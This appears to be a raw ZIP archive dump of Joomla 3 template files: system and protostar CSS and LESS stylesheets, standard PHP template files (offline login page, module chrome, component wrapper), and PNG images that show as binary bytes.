 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

body {
	margin: 0; padding: 0;
	font-family: Arial, Helvetica, Sans Serif; font-size: 14px;
	color: #333333;
	text-align: center;
}

img  {
	border: 0 none;
	margin-left: auto;
	margin-right: auto;
}

/* -- id styles ------------------------------------- */

#frame {
	margin: 20px auto;
	max-width: 400px;
	padding: 20px;
}

#frame img {
	max-width: 100%;
	height: auto;
}

#frame form {
	text-align: left;
}

/* -- class styles ---------------------------------- */

.outline {
	border: 1px solid #cccccc;
	background: #ffffff;
	padding: 2px;
}

/* -- form styles ----------------------------------- */

form {
	margin: auto;
}

form br {
	display: none;
}

form p {
	margin: 0;
	padding: 0.5em 0 0.5em 0;
}

form fieldset {
	border: 0 none;
	margin: 0em;
	padding: 0.2em;
}

label {
	display: block;
	margin: 5px 0 2px 0;
}

input {
	box-sizing: border-box;
	width: 100%;
	padding: 5px 10px;
	border: 1px solid #0E67A1;
	font-size: inherit;
	font-family: inherit;
}

input.button {
	width: auto;
	cursor: pointer;
	background-color: #006dcc;
	border-color: #04c;
	color: #fff;
	-webkit-appearance: none;
}

input.button:hover {
	background-color: #04c;
}

fieldset.input p {
	clear: left;
}

#frmlogin {
	margin: 0 10px 0 10px;
}

#frmlogin fieldset.button {
	text-align: right;
}

/* -- message styles ----------------------------------- */

#system-message {
	margin: 0 auto;
	padding: 20px 0 0;
	max-width: 445px;
}

.alert {
	background: none repeat scroll 0 0 #FFFFFF;
	border: 1px solid #CCCCCC;
	padding: 8px 25px 8px 14px;
	text-align: left;
}

.alert h4 {
	color: red;
	margin: 5px 0;
}

.alert p {
	padding: 0px;
	margin: 0px;
}

.alert .close {
	float: right;
	font-size: 24px;
	line-height: 18px;
	position: relative;
	right: -20px;
	top: -2px;
	cursor: pointer;
}
.login {
	margin-top: 5px;
}
PK!Eq�
``system/css/toolbar.cssnu&1i�/**
 * @copyright	Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

div.toolbar-list {
	margin-right: 10px;
	float: right;
	text-align: right;
}

div.toolbar-list a {
	color : #808080;
	text-decoration : none;
	display: block;
	float: left;
	border: 1px solid #DDD;
	width: 40px;
	padding: 2px 5px 2px 5px;
}
div.toolbar-list a:hover {
	color : #C64934;
	cursor: pointer;
	border: 1px solid #c24733;
	background-color: #f1e8e6;
	padding: 3px 5px 1px 5px;
}
div.toolbar-list a:active {
	color : #FF9900;
}PK!A��HHsystem/css/error_rtl.cssnu&1i�/**
 * @copyright	Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

/* Start Common Styles */

body {
	text-align: right;
}

.TD{
	text-align: left;
}

#errorboxbody {
	text-align: right;
}
#techinfo {
	text-align: right;
}
PK!���11system/index.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Template.system
 *
 * @copyright   (C) 2007 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

include __DIR__ . '/component.php';
PK!Aj$�� system/images/selector-arrow.pngnu&1i��PNG


IHDR

X0$�0PLTE������������������ޱ����������׬�������)��tRNS@��fCIDAT�M�1�0�@".6&��� 궑��͖<ۢ���ʈ�/���t
��z�����,T�MK��o���7IEND�B`�PK!s)X:PPsystem/images/calendar.pngnu&1i��PNG


IHDR�aIDATx����I���}�c۶K��b�rl뿈�۶}w��ۙ�,�U���L�&+���O'Cm�����?jnP���he�"Gf�-];
@�޹vr�!��]�<Zp9q�0����<���w��ף�{���`�@�l~FB|�����Wi>�|L�?�H�H���<y�|
P!�%E�ӳa�ݧ[�<�8�rXu�>���aݡ������/�}1�(Vy��f�������ݟ�!��d�H �;7��Ξ�(:��!�����ʔ(�m;���',���=0Bpq㱇~4�C�
���(�ō��p<�/��6�OJ������́�P�HQ�ߺ�5��e�m�r�9)�$�F}AIHsl���p��-,,��~�+ b���sҒb�J��X�0�!4��E�3����u�M�q���\������S��c��W�!T,�ĿO�R"O<7�{E��.�y����圴��S��!�I#�}S�\�ђ��������[���
��A�3f�vIIEND�B`�PK!.����!system/images/j_button2_image.pngnu&1i��PNG


IHDRK�lIIDATx����j��s:FF��m�ն�c��c'�����a�l����v�y�o��G$IRU5��!��0==��d��4�q����+�����f2[/�t���.dR�T&&3�X,Y�d2�(
2
	�pSQ��I��.�E�GEWo�ˋ5�
����A[�=V�\.�g�T ���V߻��;��q��g�g��n�bè(C��}���C��tk��|fz����\^�lè(A<��+�K��f�3<e��V�>�_6s�7ȖlEH �S�`���'���ĝP��J}a�vI
�6)��!�6��	H��5��<jY��c���-o{>�y=1>���q�~4B�&l���V�����W� �?�̖�R��)��Q��7�L��FM��ou���/�(�bs!9��(o_HW�W-�Z\�ZF���Z�PY
��
�����؅���#�Y�+�]F��aTBb	�US�O�I9�ڨ���,�4M��a������Q̀�H$6E�QUU�A��Z����ҵ�U@̾�$I�x�M�X����DF��&�q༌_Nap��f�0���D"��!����q
lIEND�B`�PK!���ߩ�!system/images/j_button2_blank.pngnu&1i��PNG


IHDR��3�pIDATxu�5�0�����af&I�Ҷ6STC�c���=NC����p�ˈW�d�x�����
�(dF!1
�Q80
s�o/�%�{�"B��D�)��4�Ƞ�1B5��)���t8�0�IEND�B`�PK!2d��� system/images/j_button2_left.pngnu&1i��PNG


IHDR�Պ0�vIDATx���0���?�-�c�&8"�2iU�X5&��W�X5�.��[��eA��RL
*Y�JҠT�T��R�YYИ�,������1�ͶD̪��Jr�s�Q1����`8�e�IEND�B`�PK!���r��%system/images/j_button2_pagebreak.pngnu&1i��PNG


IHDRK�lIDATx�ԅ�� �a�i���;i�e�*������#�C�'���8���8��R��d2�FQ�0q�	!�0��p��Bȷ[�eY�m*UU�X��Z�T1��M�|���ܻ�D��u|b~��*���3����`�hF����ͷ�MLT҇/��O]]]��|qq������U��(���;ӚΖ��\���I�&&
���k�'��aj;��ML,���(�V/���m��mb"����YN��h�Tm�h�=O��Ҝj�J��ڿ��#�!��$�j���61I�K�<Er�ĵa�15�i�'�c��;�K��)�����x
��h��\�=99Y�V`ډ�8B���_N�#�����8�O��������~���wIEND�B`�PK!�#V��!system/images/j_button2_right.pngnu&1i��PNG


IHDR�F1kIDATx��D��
www�;�d�Te`�һG�Rxn���/�ma��Kg�J��f�t;�
�v�]̀t��~t���n���
H�L���HG�@��J�t7��UKX��?ҭt+��'���B�����0JϘ�IEND�B`�PK!=F��$system/images/j_button2_readmore.pngnu&1i��PNG


IHDRK�l�IDATx��Ez�@�aݬ�G�]�ef�M�9f�A,��� ���@��|[�3Fba�8��e��h�ۈ��p�^���HQT.�ۚX<p���
����"�CH&��$b�f�Z���N�r�̲��D$:�c���H��X�i�a!��E�r�Tm�T�u��w��'L�oҶ�Ay����'d,8�h͖9(ݰA����	N�H0J�*�!U�:�&�Np���'�D*����	Nd��i~yy���ڕOy����U��o&��;1=���%�_�k_R����.O�i�{"��ђnz8�Zl�I�l�� ��@o����l8�C(.]k�;5uo�W�q����o��ԏN����N�*�+4/��e�����3O�s�6�(2C�GQ��ħk��?�{Ix����O<'
�I���jD�@dY�(JUU��s�������y`���K$�z]߶	�*��m2IEND�B`�PK!}Gr�:
:
system/offline.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.system
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$app = JFactory::getApplication();

// Output as HTML5
$this->setHtml5(true);

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Styles
JHtml::_('stylesheet', 'templates/system/css/offline.css', array('version' => 'auto'));

if ($this->direction === 'rtl')
{
	JHtml::_('stylesheet', 'templates/system/css/offline_rtl.css', array('version' => 'auto'));
}

JHtml::_('stylesheet', 'templates/system/css/general.css', array('version' => 'auto'));

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

$twofactormethods = JAuthenticationHelper::getTwoFactorMethods();
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<jdoc:include type="head" />
</head>
<body>
	<jdoc:include type="message" />
	<div id="frame" class="outline">
		<?php if ($app->get('offline_image') && file_exists($app->get('offline_image'))) : ?>
			<img src="<?php echo $app->get('offline_image'); ?>" alt="<?php echo htmlspecialchars($app->get('sitename'), ENT_COMPAT, 'UTF-8'); ?>" />
		<?php endif; ?>
		<h1>
			<?php echo htmlspecialchars($app->get('sitename'), ENT_COMPAT, 'UTF-8'); ?>
		</h1>
	<?php if ($app->get('display_offline_message', 1) == 1 && str_replace(' ', '', $app->get('offline_message')) !== '') : ?>
		<p>
			<?php echo $app->get('offline_message'); ?>
		</p>
	<?php elseif ($app->get('display_offline_message', 1) == 2 && str_replace(' ', '', JText::_('JOFFLINE_MESSAGE')) !== '') : ?>
		<p>
			<?php echo JText::_('JOFFLINE_MESSAGE'); ?>
		</p>
	<?php endif; ?>
	<form action="<?php echo JRoute::_('index.php', true); ?>" method="post" id="form-login">
	<fieldset class="input">
		<p id="form-login-username">
			<label for="username"><?php echo JText::_('JGLOBAL_USERNAME'); ?></label>
			<input name="username" id="username" type="text" class="inputbox" alt="<?php echo JText::_('JGLOBAL_USERNAME'); ?>" autocomplete="off" autocapitalize="none" />
		</p>
		<p id="form-login-password">
			<label for="passwd"><?php echo JText::_('JGLOBAL_PASSWORD'); ?></label>
			<input type="password" name="password" class="inputbox" alt="<?php echo JText::_('JGLOBAL_PASSWORD'); ?>" id="passwd" />
		</p>
		<?php if (count($twofactormethods) > 1) : ?>
			<p id="form-login-secretkey">
				<label for="secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY'); ?></label>
				<input type="text" name="secretkey" autocomplete="one-time-code" class="inputbox" alt="<?php echo JText::_('JGLOBAL_SECRETKEY'); ?>" id="secretkey" />
			</p>
		<?php endif; ?>
		<p id="submit-buton">
			<input type="submit" name="Submit" class="button login" value="<?php echo JText::_('JLOGIN'); ?>" />
		</p>
		<input type="hidden" name="option" value="com_users" />
		<input type="hidden" name="task" value="user.login" />
		<input type="hidden" name="return" value="<?php echo base64_encode(JUri::base()); ?>" />
		<?php echo JHtml::_('form.token'); ?>
	</fieldset>
	</form>
	</div>
</body>
</html>
PK!8V5system/html/modules.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.system
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/*
 * none (output raw module content)
 */
function modChrome_none($module, &$params, &$attribs)
{
	echo $module->content;
}

/*
 * html5 (chosen html5 tag and font header tags)
 */
function modChrome_html5($module, &$params, &$attribs)
{
	$moduleTag      = htmlspecialchars($params->get('module_tag', 'div'), ENT_QUOTES, 'UTF-8');
	$headerTag      = htmlspecialchars($params->get('header_tag', 'h3'), ENT_QUOTES, 'UTF-8');
	$bootstrapSize  = (int) $params->get('bootstrap_size', 0);
	$moduleClass    = $bootstrapSize !== 0 ? ' span' . $bootstrapSize : '';

	// Temporarily store header class in variable
	$headerClass    = $params->get('header_class');
	$headerClass    = !empty($headerClass) ? ' class="' . htmlspecialchars($headerClass, ENT_COMPAT, 'UTF-8') . '"' : '';

	if (!empty ($module->content)) : ?>
		<<?php echo $moduleTag; ?> class="moduletable<?php echo htmlspecialchars($params->get('moduleclass_sfx'), ENT_COMPAT, 'UTF-8') . $moduleClass; ?>">

		<?php if ((bool) $module->showtitle) :?>
			<<?php echo $headerTag . $headerClass . '>' . $module->title; ?></<?php echo $headerTag; ?>>
		<?php endif; ?>

			<?php echo $module->content; ?>

		</<?php echo $moduleTag; ?>>

	<?php endif;
}

/*
 * Module chrome that wraps the module in a table
 */
function modChrome_table($module, &$params, &$attribs)
{ ?>
	<table cellpadding="0" cellspacing="0" class="moduletable<?php echo htmlspecialchars($params->get('moduleclass_sfx'), ENT_COMPAT, 'UTF-8'); ?>">
	<?php if ((bool) $module->showtitle) : ?>
		<tr>
			<th>
				<?php echo $module->title; ?>
			</th>
		</tr>
	<?php endif; ?>
		<tr>
			<td>
				<?php echo $module->content; ?>
			</td>
		</tr>
		</table>
	<?php
}

/*
 * Module chrome that wraps the tabled module output in a <td> tag of another table
 */
function modChrome_horz($module, &$params, &$attribs)
{ ?>
	<table cellspacing="1" cellpadding="0" width="100%">
		<tr>
			<td>
				<?php modChrome_table($module, $params, $attribs); ?>
			</td>
		</tr>
	</table>
	<?php
}

/*
 * xhtml (divs and font header tags)
 * With the new advanced parameter it does the same as the html5 chrome
 */
function modChrome_xhtml($module, &$params, &$attribs)
{
	$moduleTag      = htmlspecialchars($params->get('module_tag', 'div'), ENT_QUOTES, 'UTF-8');
	$headerTag      = htmlspecialchars($params->get('header_tag', 'h3'), ENT_QUOTES, 'UTF-8');
	$bootstrapSize  = (int) $params->get('bootstrap_size', 0);
	$moduleClass    = $bootstrapSize !== 0 ? ' span' . $bootstrapSize : '';

	// Temporarily store header class in variable
	$headerClass    = $params->get('header_class');
	$headerClass    = $headerClass ? ' class="' . htmlspecialchars($headerClass, ENT_COMPAT, 'UTF-8') . '"' : '';

	if (!empty ($module->content)) : ?>
		<<?php echo $moduleTag; ?> class="moduletable<?php echo htmlspecialchars($params->get('moduleclass_sfx'), ENT_COMPAT, 'UTF-8') . $moduleClass; ?>">
			<?php if ((bool) $module->showtitle) : ?>
				<<?php echo $headerTag . $headerClass . '>' . $module->title; ?></<?php echo $headerTag; ?>>
			<?php endif; ?>
			<?php echo $module->content; ?>
		</<?php echo $moduleTag; ?>>
	<?php endif;
}

/*
 * Module chrome that allows for rounded corners by wrapping in nested div tags
 */
function modChrome_rounded($module, &$params, &$attribs)
{ ?>
		<div class="module<?php echo htmlspecialchars($params->get('moduleclass_sfx'), ENT_COMPAT, 'UTF-8'); ?>">
			<div>
				<div>
					<div>
						<?php if ((bool) $module->showtitle) : ?>
							<h3><?php echo $module->title; ?></h3>
						<?php endif; ?>
					<?php echo $module->content; ?>
					</div>
				</div>
			</div>
		</div>
	<?php
}

/*
 * Module chrome that add preview information to the module
 */
function modChrome_outline($module, &$params, &$attribs)
{
	static $css = false;

	if (!$css)
	{
		$css = true;
		$doc = JFactory::getDocument();

		$doc->addStyleDeclaration('
		.mod-preview {
			background: rgba(100,100,100,.08);
			box-shadow: 0 0 0 4px #f4f4f4, 0 0 0 5px rgba(100,100,100,.2);
			border-radius: 1px;
			margin: 8px 0;
		}
		.mod-preview-info {
			padding: 4px 6px;
			margin-bottom: 5px;
			font-family: Arial, sans-serif;
			font-size: .75rem;
			line-height: 1rem;
			color: white;
			background-color: #33373f;
			border-radius: 3px;
			box-shadow: 0 -10px 20px rgba(0,0,0,.2) inset;
		}
		.mod-preview-info span {
			font-weight: bold;
			color: #ccc;
		}
		.mod-preview-wrapper {
			margin-bottom: .5rem;
		}
		');
	}
	?>
	<div class="mod-preview">
		<div class="mod-preview-info">
			<div class="mod-preview-position">
				<?php echo JText::sprintf('JGLOBAL_PREVIEW_POSITION', $module->position); ?>
			</div>
			<div class="mod-preview-style">
				<?php echo JText::sprintf('JGLOBAL_PREVIEW_STYLE', $module->style); ?>
			</div>
		</div>
		<div class="mod-preview-wrapper">
			<?php echo $module->content; ?>
		</div>
	</div>
	<?php
}
PK!�{ZCCsystem/component.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Template.system
 *
 * @copyright   (C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var \Joomla\CMS\Document\HtmlDocument $this */
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="head" />
</head>
<body class="contentpane">
	<jdoc:include type="message" />
	<jdoc:include type="component" />
</body>
</html>
PK!A��_#_#protostar/less/variables.lessnu&1i�//
// Variables
// --------------------------------------------------


// Global values
// --------------------------------------------------


// Grays
// -------------------------
@black:                 #000;
@grayDarker:            #222;
@grayDark:              #333;
@gray:                  #555;
@grayLight:             #999;
@grayLighter:           #eee;
@white:                 #fff;


// Accent colors
// -------------------------
@blue:                  #049cdb;
@blueDark:              #0064cd;
@green:                 #46a546;
@red:                   #9d261d;
@yellow:                #ffc40d;
@orange:                #f89406;
@pink:                  #c3325f;
@purple:                #7a43b6;


// Scaffolding
// -------------------------
@bodyBackground:        @white;
@textColor:             @grayDark;


// Links
// -------------------------
@linkColor:             #005e8d;
@linkColorHover:        darken(@linkColor, 15%);


// Typography
// -------------------------
@sansFontFamily:        "Helvetica Neue", Helvetica, Arial, sans-serif;
@serifFontFamily:       Georgia, "Times New Roman", Times, serif;
@monoFontFamily:        Monaco, Menlo, Consolas, "Courier New", monospace;

// > Joomla JUI
@baseFontSize:          13px;
// < Joomla JUI
@baseFontFamily:        @sansFontFamily;
// > Joomla JUI
@baseLineHeight:        18px;
// < Joomla JUI
@altFontFamily:         @serifFontFamily;

@headingsFontFamily:    inherit; // empty to use BS default, @baseFontFamily
@headingsFontWeight:    bold;    // instead of browser default, bold
@headingsColor:         inherit; // empty to use BS default, @textColor


// Component sizing
// -------------------------
// Based on 14px font-size and 20px line-height

@fontSizeLarge:         @baseFontSize * 1.25; // ~18px
// > Joomla JUI
@fontSizeSmall:         ceil(@baseFontSize * 0.90); // ~12px
// < Joomla JUI
@fontSizeMini:          @baseFontSize * 0.75; // ~11px

@paddingLarge:          11px 19px; // 44px
@paddingSmall:          2px 10px;  // 26px
@paddingMini:           0 6px;   // 22px

@baseBorderRadius:      4px;
@borderRadiusLarge:     6px;
@borderRadiusSmall:     3px;


// Tables
// -------------------------
@tableBackground:                   transparent; // overall background-color
@tableBackgroundAccent:             #f9f9f9; // for striping
@tableBackgroundHover:              #f5f5f5; // for hover
@tableBorder:                       #ddd; // table and cell border

// Buttons
// -------------------------
@btnBackground:                     @white;
@btnBackgroundHighlight:            darken(@white, 10%);
@btnBorder:                         #bbb;

@btnPrimaryBackground:              @linkColor;
@btnPrimaryBackgroundHighlight:     spin(@btnPrimaryBackground, 20%);

@btnInfoBackground:                 #5bc0de;
@btnInfoBackgroundHighlight:        #2f96b4;

@btnSuccessBackground:              #62c462;
@btnSuccessBackgroundHighlight:     #51a351;

@btnWarningBackground:              lighten(@orange, 15%);
@btnWarningBackgroundHighlight:     @orange;

@btnDangerBackground:               #ee5f5b;
@btnDangerBackgroundHighlight:      #bd362f;

@btnInverseBackground:              #444;
@btnInverseBackgroundHighlight:     @grayDarker;


// Forms
// -------------------------
@inputBackground:               @white;
@inputBorder:                   #ccc;
@inputBorderRadius:             3px;
@inputDisabledBackground:       @grayLighter;
@formActionsBackground:         #f5f5f5;
@inputHeight:                   @baseLineHeight + 10px; // base line-height + 8px vertical padding + 2px top/bottom border


// Dropdowns
// -------------------------
@dropdownBackground:            @white;
@dropdownBorder:                rgba(0,0,0,.2);
@dropdownDividerTop:            #e5e5e5;
@dropdownDividerBottom:         @white;

@dropdownLinkColor:             @grayDark;
@dropdownLinkColorHover:        @white;
@dropdownLinkColorActive:       @dropdownLinkColor;

@dropdownLinkBackgroundHover:   @dropdownLinkBackgroundActive;
@dropdownLinkBackgroundActive:  @linkColor;



// COMPONENT VARIABLES
// --------------------------------------------------


// Z-index master list
// -------------------------
// Used for a bird's eye view of components dependent on the z-axis
// Try to avoid customizing these :)
@zindexDropdown:          1000;
@zindexTooltip:           1030;
@zindexFixedNavbar:       1030;
@zindexModalBackdrop:     1040;
@zindexModal:             1050;
@zindexPopover:           1060;

// Sprite icons path
// -------------------------
@iconSpritePath:          "../img/glyphicons-halflings.png";
@iconWhiteSpritePath:     "../img/glyphicons-halflings-white.png";


// Input placeholder text color
// -------------------------
@placeholderText:         @grayLight;


// Hr border color
// -------------------------
@hrBorder:                @grayLighter;


// Horizontal forms & lists
// -------------------------
@horizontalComponentOffset:       180px;


// Wells
// -------------------------
@wellBackground:                  #f5f5f5;


// Navbar
// -------------------------
@navbarCollapseWidth:             979px;
@navbarCollapseDesktopWidth:      @navbarCollapseWidth + 1;

@navbarHeight:                    40px;
@navbarBackgroundHighlight:       #ffffff;
@navbarBackground:                darken(@navbarBackgroundHighlight, 5%);
@navbarBorder:                    darken(@navbarBackground, 12%);

@navbarText:                      @gray;
@navbarLinkColor:                 @gray;
@navbarLinkColorHover:            @grayDark;
@navbarLinkColorActive:           @gray;
@navbarLinkBackgroundHover:       transparent;
@navbarLinkBackgroundActive:      darken(@navbarBackground, 5%);

@navbarBrandColor:                @navbarLinkColor;

// Inverted navbar
@navbarInverseBackground:                #111111;
@navbarInverseBackgroundHighlight:       #222222;
@navbarInverseBorder:                    #252525;

@navbarInverseText:                      @grayLight;
@navbarInverseLinkColor:                 @grayLight;
@navbarInverseLinkColorHover:            @white;
@navbarInverseLinkColorActive:           @navbarInverseLinkColorHover;
@navbarInverseLinkBackgroundHover:       transparent;
@navbarInverseLinkBackgroundActive:      @navbarInverseBackground;

@navbarInverseSearchBackground:          lighten(@navbarInverseBackground, 25%);
@navbarInverseSearchBackgroundFocus:     @white;
@navbarInverseSearchBorder:              @navbarInverseBackground;
@navbarInverseSearchPlaceholderColor:    #ccc;

@navbarInverseBrandColor:                @navbarInverseLinkColor;


// Pagination
// -------------------------
@paginationBackground:                #fff;
@paginationBorder:                    #ddd;
@paginationActiveBackground:          #f5f5f5;


// Hero unit
// -------------------------
@heroUnitBackground:              @grayLighter;
@heroUnitHeadingColor:            inherit;
@heroUnitLeadColor:               inherit;


// Form states and alerts
// -------------------------
@warningText:             #c09853;
@warningBackground:       #fcf8e3;
@warningBorder:           darken(spin(@warningBackground, -10), 3%);

@errorText:               #b94a48;
@errorBackground:         #f2dede;
@errorBorder:             darken(spin(@errorBackground, -10), 3%);

@successText:             #468847;
@successBackground:       #dff0d8;
@successBorder:           darken(spin(@successBackground, -10), 5%);

@infoText:                #3a87ad;
@infoBackground:          #d9edf7;
@infoBorder:              darken(spin(@infoBackground, -10), 7%);


// Tooltips and popovers
// -------------------------
@tooltipColor:            #fff;
@tooltipBackground:       #000;
@tooltipArrowWidth:       5px;
@tooltipArrowColor:       @tooltipBackground;

@popoverBackground:       #fff;
@popoverArrowWidth:       10px;
@popoverArrowColor:       #fff;
@popoverTitleBackground:  darken(@popoverBackground, 3%);

// Special enhancement for popovers
@popoverArrowOuterWidth:  @popoverArrowWidth + 1;
@popoverArrowOuterColor:  rgba(0,0,0,.25);



// GRID
// --------------------------------------------------


// Default 940px grid
// -------------------------
@gridColumns:             12;
@gridColumnWidth:         60px;
@gridGutterWidth:         20px;
@gridRowWidth:            (@gridColumns * @gridColumnWidth) + (@gridGutterWidth * (@gridColumns - 1));
// > Joomla JUI
// 1200px min
@gridColumnWidth1200:     60px;
@gridGutterWidth1200:     20px;
@gridRowWidth1200:        (@gridColumns * @gridColumnWidth) + (@gridGutterWidth * (@gridColumns - 1));

// 768px-979px
@gridColumnWidth768:      42px;
@gridGutterWidth768:      20px;
@gridRowWidth768:         (@gridColumns * @gridColumnWidth) + (@gridGutterWidth * (@gridColumns - 1));


// Fluid grid
// -------------------------
@fluidGridColumnWidth:    6.382978723%;
@fluidGridGutterWidth:    2.127659574%;

// 1200px min
@fluidGridColumnWidth1200:     6.382978723%;
@fluidGridGutterWidth1200:     2.127659574%;

// 768px-979px
@fluidGridColumnWidth768:      6.382978723%;
@fluidGridGutterWidth768:      2.127659574%;
// < Joomla JUI
PK!.��T��protostar/less/icomoon.lessnu&1i�@font-face {
	font-family: 'IcoMoon';
	src: url('../../../media/jui/fonts/IcoMoon.eot');
	src: url('../../../media/jui/fonts/IcoMoon.eot?#iefix') format('embedded-opentype'),
	url('../../../media/jui/fonts/IcoMoon.woff') format('woff'),
	url('../../../media/jui/fonts/IcoMoon.ttf') format('truetype'),
	url('../../../media/jui/fonts/IcoMoon.svg#IcoMoon') format('svg');
	font-weight: normal;
	font-style: normal;
}
@import "../../../media/jui/less/icomoon.less";
PK!�AqG protostar/less/template_rtl.lessnu&1i�// Specific RTL. rtl class is added to body tag

// Fix for sub menu alignment
.rtl .navigation .nav-child {
	left: auto;
	right:0;
}
.rtl .navigation .nav > li > .nav-child:before {
	left: auto;
	right:12px;
}
.rtl .navigation .nav > li > .nav-child:after {
	left: auto;
	right:13px;
}

// Category collapse
.rtl .categories-list .collapse {
	margin: 0 20px 0 0;
}

// Modal footer
.rtl .modal-footer button {
	float: left;
}

// Smart search select field margin
.rtl .finder-selects {
    margin: 0 0 15px 15px;
}PK!)�V�;;protostar/less/template.lessnu&1i�// CSS Reset
@import "../../../media/jui/less/reset.less";

// Core variables and mixins
@import "variables.less"; // Custom for this template
@import "../../../media/jui/less/mixins.less";

// Grid system and page structure
@import "../../../media/jui/less/scaffolding.less";
@import "../../../media/jui/less/grid.less";
@import "../../../media/jui/less/layouts.less";

// Base CSS
@import "../../../media/jui/less/type.less";
@import "../../../media/jui/less/code.less";
@import "../../../media/jui/less/forms.less";
@import "../../../media/jui/less/tables.less";

// Components: common
// @import "../../../media/jui/less/sprites.less";
@import "../../../media/jui/less/dropdowns.less";
@import "../../../media/jui/less/wells.less";
@import "../../../media/jui/less/component-animations.less";
@import "../../../media/jui/less/close.less";

// Components: Buttons & Alerts
@import "../../../media/jui/less/buttons.less";
@import "../../../media/jui/less/button-groups.less";
@import "../../../media/jui/less/alerts.less"; // Note: alerts share common CSS with buttons and thus have styles in buttons.less

// Components: Nav
@import "../../../media/jui/less/navs.less";
@import "../../../media/jui/less/navbar.less";
@import "../../../media/jui/less/breadcrumbs.less";
@import "../../../media/jui/less/pagination.less";
@import "../../../media/jui/less/pager.less";

// Components: Popovers
@import "../../../media/jui/less/modals.less";
@import "../../../media/jui/less/tooltip.less";
@import "../../../media/jui/less/popovers.less";

// Components: Misc
@import "../../../media/jui/less/thumbnails.less";
@import "../../../media/jui/less/labels-badges.less";
@import "../../../media/jui/less/progress-bars.less";
@import "../../../media/jui/less/accordion.less";
@import "../../../media/jui/less/carousel.less";
@import "../../../media/jui/less/hero-unit.less";

// Utility classes
@import "../../../media/jui/less/utilities.less";

// RESPONSIVE CLASSES
// ------------------

@import "../../../media/jui/less/responsive-utilities.less";


// MEDIA QUERIES
// ------------------

// Phones to portrait tablets and narrow desktops
@import "../../../media/jui/less/responsive-767px-max.less";

// Tablets to regular desktops
@import "../../../media/jui/less/responsive-768px-979px.less";

// Large desktops
@import "../../../media/jui/less/responsive-1200px-min.less";


// RESPONSIVE NAVBAR
// ------------------

// From 979px and below, show a button to toggle navbar contents
@import "../../../media/jui/less/responsive-navbar.less";

// Extended for JUI
@import "../../../media/jui/less/bootstrap-extended.less"; // Has to be last to override when necessary
// div.modal (instead of .modal)
@import "../../../media/jui/less/modals.joomla.less";
@import "../../../media/jui/less/responsive-767px-max.joomla.less";

// Icon Font
@import "icomoon.less";

/* Site Body Styles */
body {
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}
body.site{
	border-top:3px solid #0088cc;
	padding: 20px;
	background-color: #f4f6f7;
}
body.site.fluid{
	background-color: #ffffff;
}
.thumbnail {
	margin-bottom:9px;
}
.accordion-group {
	background:#fff;
}
/* Site Title (if no logo) */
.site-title {
	font-size: 40px;
	font-size: calc(~"16px + 2.16vw");
	line-height: 48px;
	font-weight: bold;
}
@media (min-width: 1024px) {
	.site-title {
		font-size: 40px;
	}
}
.brand {
	color: darken(@linkColor, 20%);
	.transition(color .5s linear);
}
.brand:hover {
	color: @linkColor;
	text-decoration: none;
}
/* Header */
.header{
	margin-bottom: 10px;
}
.header .finder {
	margin-top: 14px;
}
.header .finder .btn{
	margin-top: 0px;
}
/* Nav */
.navigation{
	padding: 5px 0;
	border-top: 1px solid rgba(0, 0, 0, 0.075);
	border-bottom: 1px solid rgba(0, 0, 0, 0.075);
	margin-bottom: 10px;
}
.navigation .nav-pills{
	margin-bottom: 0;
}
/* Hero Banner Unit */
.hero-unit{
	background-color: #08C;
}
.hero-unit > *{
	color: white;
	text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);
}
/* Container */
.container{
	max-width: 960px;
}
.body .container{
	background-color: #fff;
	-moz-border-radius: 4px;
	-webkit-border-radius: 4px;
	border-radius: 4px;
	padding: 20px;
	border: 1px solid rgba(0, 0, 0, 0.15);
	-moz-box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.05);
	-webkit-box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.05);
	box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.05);
}
/* Wells */
.well .page-header{
	margin: 0px 0px 5px 0px;
}
/* Headings */

h1, h2, h3, h4, h5, h6 {
  	margin: (@baseLineHeight / 1.5) 0;
	word-wrap: break-word;
}
h1 { font-size: 26px; line-height: 28px; }
h2 { font-size: 22px; line-height: 24px; }
h3 { font-size: 18px; line-height: 20px; }
h4 { font-size: 14px; line-height: 16px; }
h5 { font-size: 13px; line-height: 15px; }
h6 { font-size: 12px; line-height: 14px; }
/* Module */
.module-header {
	padding-bottom: 17px;
	margin: 20px 0 18px 0;
	border-bottom: 1px solid #eeeeee;
}
/* Single Item */
p {
	word-wrap: break-word;
}
.item-title {
	margin-bottom:9px;
}
.item-content {
	margin:18px 0;
}
.item-subtitle {
	margin-bottom:9px;
}
.pull-right.item-image {
	margin:0 0 18px 20px;
}
